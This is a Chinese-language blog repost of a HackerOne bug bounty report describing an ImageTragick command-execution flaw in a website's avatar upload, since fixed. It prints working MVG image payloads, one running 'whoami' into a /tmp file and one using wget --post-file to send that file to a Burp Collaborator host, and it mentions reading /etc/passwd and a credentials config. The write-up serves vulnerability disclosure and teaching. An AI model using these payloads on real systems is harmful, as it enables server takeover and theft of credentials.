Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >HackerOne | 头像上传imagetragick命令执行

HackerOne | 头像上传imagetragick命令执行

作者头像
Timeline Sec
发布于 2019-12-13 05:49:56
发布于 2019-12-13 05:49:56
1.4K00
代码可运行
举报
文章被收录于专栏:Timeline SecTimeline Sec
运行总次数:0
代码可运行

漏洞信息

发现者:alyssa_herrera

漏洞种类:命令执行

危害等级:高危

漏洞状态:已修复

前言

alyssa_herrera在sofurry.com头像上传处存在imagetragick命令执行,能够发现一个配置文件包含数据库凭证、其他密钥,影响网站。

漏洞再现

在审核配置文件头像功能的过程中,我发现通过使用curl请求(如下所示) 使网站受到image tragick影响。

然后我去请求 /etc/passwd。

然后我想进一步扩大rce的影响。由于不想反弹shell到服务器上,我选择简单的在tmp文件夹中创建一个文件,然后将命令输出保存到该文件中,然后对其进行提取。payload如下:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|whoami>>/tmp/alyssa.txt")'
pop graphic-context

然后我们使用wget去读取它。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg "|wget --post-file /tmp/alyssa.txt XXX.burpcollaborator.net")'
pop graphic-context

接着一个简单的命令ls -la。

然后我又读取了位于受保护目录中的index-test.php文件的内容。

当我读取到这配置文件,记录下来后立即报告了它。

漏洞影响

该漏洞可以让攻击者执行任意命令,读取服务器上的文件,甚至控制服务器。

乌云相关文章

有缘网主站命令执行 (ImageMagick 补丁绕过):

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0214787.html

开心网主站 ImageMagick 命令执行三处 :

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205530.html

SAE 沙盒绕过(ImageMagick CVE20163714 应用实例):

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
 https://wooyun.x10sec.org/static/bugs/wooyun-2016- 0205051.html

翻译自hackerone

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-12-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
CVE-2016-3714 - ImageMagick 命令执行分析
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。
phith0n
2020/10/15
1.1K0
Web Hacking 101 中文版 十五、代码执行
远程代码执行是指注入由漏洞应用解释和执行的代码。这通常由用户提交输入,应用使用它而没有任何类型的处理或验证而导致。
ApacheCN_飞龙
2022/12/01
4240
Web Hacking 101 中文版 十五、代码执行
安全预警:ImageMagick图象处理软件远程代码执行漏洞(CVE-2016-3714)
ImageMagick是一款广泛流行的图像处理软件,有无数的网站使用它来进行图像处理,但在本周二,ImageMagick披露出了一个严重的0day漏洞,此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。Slack安全工程师Ryan Hube发现了这一0day漏洞。 如果你在网站中使用了ImageMagick去识别,裁剪或者调整用户上传的图像,你必须确认已经使用了这些缓解措施,并且调整你的代码只接受有效的图像文件,沙盒ImageMagick也是一个不错的主意。 在这个安全漏洞公布之后,
FB客服
2018/02/07
1.3K0
安全预警:ImageMagick图象处理软件远程代码执行漏洞(CVE-2016-3714)
Imagemagick邂逅Getimagesize的那点事儿
前段时间写的文章,在微博上说7月底结束分享一下,总算可以发了。感谢 @voidfyoo 提出的这个问题。
FB客服
2019/08/02
1.1K0
Imagemagick邂逅Getimagesize的那点事儿
看我如何发现Facebook的ImageMagick漏洞并获4万美元赏金
相信大多数人都对ImageMagick RCE漏洞有所知晓,该漏洞于去年4月底被发现,由于其软件本身被很多知名网站使用,且存在很多流行拓展插件,漏洞最终造成了很大影响。ImageMagick的首次漏洞发现,是白帽子stewie通过HackerOne平台的Mail.Ru网站测试发现的,该漏洞为文件读取漏洞;随后,Mail.Ru安全团队把这一漏洞报送给了ImageMagick官方进行修复。但仅在几天后, Mail.Ru安全团队研究人员Nikolay Ermishkin深入分析,又发现了ImageMagick
FB客服
2018/02/09
1.4K0
看我如何发现Facebook的ImageMagick漏洞并获4万美元赏金
渗透测试中文件上传技巧
根据语言、解析漏洞、中间件、系统特性以及一些绕过WAF的方法:黑名单、大小写、ADS流、截断、空格、长度、htaccess等生存文件名字典。
瓦都剋
2020/08/07
1.4K0
RCE命令执行/代码执行
RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
wuming
2021/01/21
2.2K0
RCE命令执行/代码执行
模糊测试之攻击回显
描述:一个渗透安全工程师常常会在,某些安全测试项目中遇到,代码或者命令可以被执行,但是无任何的回显特征来判断攻击成功,
全栈工程师修炼指南
2020/10/23
3.2K0
模糊测试之攻击回显
绕过Disable Functions来搞事情
多半是disable_functions惹的祸。查看phpinfo发现确实设置了disable_functions:
FB客服
2021/03/25
4.7K0
利用DNS协议回显数据
这个问题已经是去年提出的了,之前也看到过,在 CTF 题目环境中利用过却对原理不慎了解,在公司大佬们的帮助下成功了理解了一波原理。
信安之路
2018/08/08
2.4K0
利用DNS协议回显数据
bypass disable function学习
信息收集是不可缺少的一环;通常的,我们在通过前期各种工作成功执行代码 or 发现了一个phpinfo页面之后,会从该页面中搜集一些可用信息以便后续漏洞的寻找。
HhhM
2022/08/10
2.3K0
bypass disable function学习
干货 | 突破disable_functions限制执行命令·下
UAF漏洞(Use-After-Free)是一种内存破坏漏洞,漏洞成因是一块堆内存被释放了之后又被使用。又被使用指的是:指针存在(悬垂指针被引用)。这个引用的结果是不可预测的,因为不知道会发生什么。由于大多数的堆内存其实都是C++对象,所以利用的核心思路就是分配堆去占坑,占的坑中有自己构造的虚表。
HACK学习
2022/02/17
3.5K0
干货 | 突破disable_functions限制执行命令·下
回忆phpcms头像上传漏洞以及后续影响
为了响应爱慕锅(Mramydnei)、撸大师(索马里的海贼)、fd牛(/fd)的号召成立的parsec团队,以及各位老师多年来对我的教育,我要写篇回忆稿。看标题大家可能觉得,这陈芝麻烂谷子的事你还拿出来说啥。当然,我自己搓一点都无所谓,但怎么能丢了parsec的脸,各位还是且听我娓娓道来~
phith0n
2020/10/15
1.5K0
突破disable_function限制执行命令
disable_functions 是 php.ini 中的一个设置选项。可以用来设置PHP环境禁止使用某些函数,通常是网站管理员为了安全起见,用来禁用某些危险的命令执行函数等。(eval 在 php 中不属于函数,因此 disable_functions 对它不起作用)
ph0ebus
2023/08/26
1.2K0
SRC逻辑漏洞挖掘详解以及思路和技巧
由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误,统称为业务逻辑漏洞。常见的逻辑漏洞有交易支付、密码修改、密码找回、越权修改、越权查询、突破限制等,下图是简单的逻辑漏洞总结,在挖掘的过程中更多的时候需要脑洞大开:
HACK学习
2020/02/26
5.8K0
PHP Disabled_functions Bypass
PHP 5.x Shellshock Exploit # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) #
风流
2018/06/01
2.2K0
干货 | 漏洞挖掘中RCE漏洞常用的Payload总结
RCE:远程代码执行 (RCE) 使攻击者能够通过注入攻击执行恶意代码。代码注入攻击不同于命令注入攻击。攻击者的能力取决于服务器端解释器的限制。在某些情况下,攻击者可能能够从代码注入升级为命令注入。远程代码评估可能导致易受攻击的 Web 应用程序和 Web 服务器的全面妥协. 需要注意的是,几乎每种编程语言都有代码评估功能。
HACK学习
2022/05/23
3.4K0
干货 | 漏洞挖掘中RCE漏洞常用的Payload总结
干货技巧 | phpinfo信息利用
php扩展的路径,图省事没用lamp包有点捞…(这里还是说下linux不推荐用phpstudy,很多linux装了phpstudy系统会崩)
HACK学习
2019/11/04
4K0
干货技巧 | phpinfo信息利用
im4java + imagemagic 搭建一个图片处理服务
imagemagic + im4java 进行图片处理 利用 imagemagic 对图片进行处理,java工程中,使用im4java来操作imagemagic的api 一、环境 how to i
一灰灰blog
2018/02/06
1.9K0
Go代码审计:Gitea远程命令执行漏洞链
这是一个非常漂亮的漏洞链,很久没见过了。我用docker来复现并学习这个漏洞,官方提供了docker镜像,vulhub也会上线这个环境。
FB客服
2018/07/31
1.6K0
Go代码审计:Gitea远程命令执行漏洞链
相关推荐
CVE-2016-3714 - ImageMagick 命令执行分析
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验